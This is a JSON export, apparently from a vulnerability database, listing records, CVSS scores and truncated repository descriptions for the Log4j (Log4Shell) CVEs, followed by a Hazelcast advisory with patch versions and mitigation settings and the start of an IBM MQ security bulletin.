"<h1><img src='https://raw.githubusercontent.com/mergebase/log4j-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 
6.0}, "published": "2021-12-12T00:29:03", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-03-31T03:02:14", "id": "C68080B0-3163-5E76-AD65-2B454DBB95EE", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-06T00:04:58", "description": "<pre>\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2580\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T14:29:05", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44832", "CVE-2021-44228", "CVE-2021-45105"], "modified": "2022-03-05T22:52:28", "id": "6D93189D-E2D8-5571-88D5-D778E1CB9C23", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-08T20:34:24", "description": "# CVE-2021-44228 a.k.a. LOG4J\nThis is a public repository from W...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T15:13:06", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44832", "CVE-2021-45105", 
"CVE-2021-44228"], "modified": "2022-01-08T17:32:42", "id": "C772DCBB-20D0-51DD-A580-F96689E65773", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-05T16:29:14", "description": "# divd-2021-00038--log4j-scanner\n\nThis scanner will recursively ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T12:16:07", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-04-05T07:52:27", "id": "54E7D93D-9216-5EDE-A4AD-8324A367E67B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-18T12:33:49", "description": "# Patch pulsar images with Apache Log4J 2.17.1 upgrade\n\nCovers [...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": 
"HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T15:46:49", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-03-18T12:16:50", "id": "7B9BDDBA-81E8-5739-B3F7-419C0D6E2316", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-06T00:04:09", "description": "<pre>\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2580\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": 
"2021-12-16T14:29:05", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44832", "CVE-2021-44228", "CVE-2021-45105"], "modified": "2022-03-05T22:52:28", "id": "44463794-7940-582A-AFFF-676628A86A72", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-13T15:45:38", "description": "# Log4J-Mitigation-[CVE-2021-44228](https://cve.mitre.org/cgi-bi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T07:24:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44832", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-13T14:43:09", "id": "2AF7350D-AB79-5AB5-8AF9-0F351CE13D30", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-13T15:45:43", "description": "# Log4J-Mitigation-[CVE-2021-44228](https://cve.mitre.org/cgi-bi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T07:24:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44832", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-13T14:43:09", "id": "342CC1B7-6E24-5767-A7B1-90B95A91B503", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-13T15:34:22", "description": "# 
Log4J-Mitigation-[CVE-2021-44228](https://cve.mitre.org/cgi-bi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T07:24:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44832", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-13T14:43:09", "id": "DECBAC7B-9235-5E00-81C1-142CD41306FB", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-13T15:38:51", "description": "# Log4J-Mitigation-[CVE-2021-44228](https://cve.mitre.org/cgi-bi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": 
"2021-12-13T07:24:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44832", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-13T14:43:09", "id": "C76F7089-967B-5A7F-B8DA-629452876A2A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-05T16:21:50", "description": "# Log4j Threat Hunting and Incident Response Resources\n\n## Lates...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-09T08:22:24", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-34473", "CVE-2021-44228"], "modified": "2022-01-10T19:21:49", "id": "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-31T01:27:14", "description": "# log4j-finder\n\nA Python3 script to scan the filesystem to find ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T10:04:42", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-03-30T22:28:03", "id": "6A4495E8-D723-5923-BB6A-B9EA838CF69B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-27T12:02:26", "description": "# scan4log4shell\n> Scanner to send specially crafted requests an...", 
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T06:09:04", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44228", "CVE-2021-45105"], "modified": "2022-02-27T02:39:14", "id": "2AF28508-1272-5281-BDB7-B44D3EFC7C72", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-18T17:13:06", "description": "# \ud83d\udca1 Log4j CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 Resourc...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T11:34:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted 
Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45105", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-18T15:25:17", "id": "C3DA2A71-DD68-5EF3-AC4C-5A10DECD333B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "osv": [{"lastseen": "2023-04-11T01:40:12", "description": "### Impact\nA highly critical 0-day exploit (CVE-2021-44228) is found in Apache log4j 2 library on December 9, 2021.\n\nThis affects Apache log4j versions from 2.0-beta9 to 2.14.1 (inclusive). \n\nThis vulnerability allows a remote attacker to execute code on the server if the system logs an attacker-controlled string value with the attacker's JNDI LDAP server lookup.\n\nAnother vulnerability related to the same library, which was discovered on 12/14/2021 (CVE-2021-45046) and revealed another Remote Code Execution vulnerability, has been investigated by Hazelcast team as well and it is found that it does not affect Hazelcast Products under default configurations. \n\nThe finding of CVE-2021-45105 on 12/14/2021, which can cause a Denial of Service attack, was investigated by Hazelcast team and it is confirmed that it does not affect Hazelcast Products under default configurations. \n\nThe finding of CVE-2021-44832 on 12/28/2021, which is a medium vulnerability, is investigated by our security team as well, and not considered to be as critical. 
It requires attacker to be able to modify logging configuration, which means attacker can modify the filesystem and/or can already execute arbitrary code which is more of a general security breach rather than something log4j specific.\n\nNote that Hazelcast IMDG and IMDG Enterprise itself is not affected.\n\nHowever, given version distributions are considered to be vulnerable since related ZIP and TGZ distributions contain a vulnerable Hazelcast Management Center version.\n\n### Patches\nCVE-2021-44228 is fixed in log4j 2.15.0.\nCVE-2021-45046 is fixed in log4j 2.16.0.\nCVE-2021-45105 is fixed in log4j 2.17.0.\nCVE-2021-44832 is fixed in log4j 2.17.1.\n\nAs of 12/21/2021, Hazelcast team has released a new version of all affected products that upgrades log4j to 2.17.0 as listed below: \nHazelcast Management Center 4.2021.12-1, Hazelcast Management Center 5.0.4.\nHazelcast IMDG and IMDG Enterprise 4.0.5, 4.1.8 and 4.2.4.\nHazelcast Jet 4.5.3.\nHazelcast Platform 5.0.2.\n\nAs of 01/06/2022, Hazelcast Management Center 4.2022.01 with the updated log4j 2.17.1 is released. log4j2.17.1 will be included in Management Center 5.1 that is expected to be released in February. 
\n\nHazelcast recommends upgrading to the latest versions available.\n\n### Workarounds\nFor users that an upgrade is not an option, below mitigations can be applied.\n\n#### Disabling lookups via Environment Variable \nSetting the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true .\nThis option is the easiest to apply for containerized environments.\n\n#### Disabling lookups in log4j2 configuration\nAnother good option since there is no need to replace JARs or no need to modify logging configuration file, users who cannot upgrade to 2.17.0 can mitigate the exposure by:\n\nUsers of Log4j 2.10 or greater may add `-Dlog4j2.formatMsgNoLookups=true `as a command line option or add `-Dlog4j2.formatMsgNoLookups=true` in a `log4j2.component.properties` file on the classpath to prevent lookups in log event messages.\nUsers since Log4j 2.7 may specify `%m{nolookups}` in the PatternLayout configuration to prevent lookups in log event messages.\nAs an example; users deploying Hazelcast Management Center via helm charts can do the following to disable lookups and restart in one command:\n\n`helm upgrade <release-name> hazelcast/hazelcast --set mancenter.javaOpts=\"<javaOpts> -Dlog4j2.formatMsgNoLookups=true\"`\n\nWhere <release-name> is the release name and <javaOpts> is existing java options user has added previously.\n\n#### Removing the JndiLookup from classpath\nRemove the JndiLookup and JndiManager classes from the log4j-core jar. 
Note that removal of the JndiManager will cause the JndiContextSelector and JMSAppender to no longer function.\n\n### References\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-44228\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-45046\nhttps://vulners.com/cve/CVE-2021-45105\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-44832\nhttps://logging.apache.org/log4j/2.x/index.html\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [our repo](https://github.com/hazelcast/hazelcast)\n* Slack us at [Hazelcast Community Slack](https://slack.hazelcast.com/)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-21T23:25:04", "type": "osv", "title": "Security Advisory for \"Log4Shell\"", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2023-04-11T01:40:10", "id": "OSV:GHSA-V57X-GXFJ-484Q", "href": "https://osv.dev/vulnerability/GHSA-v57x-gxfj-484q", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ibm": [{"lastseen": "2023-05-23T17:58:26", "description": "## 
Summary\n\nA Denial of Service issue was identified within the Log4j fix for CVE-2021-45046 that is used by Fabric Gateway to provide logging functionality. Fabric Gateway is used by the IBM MQ blockchain bridge component of IBM MQ to provide connection capability between IBM MQ queue managers and Hyperledger Fabric. The IBM MQ Blockchain Bridge is shipped as part of IBM MQ on Linux x86-64 only, under the MQSeriesBCBridge RPM package. Based on current knowledge and analysis, no other IBM MQ components or installable packages are affected. This bulletin provides patch information to address the reported Log4j vulnerabilities\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n**DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n**CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n**DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: 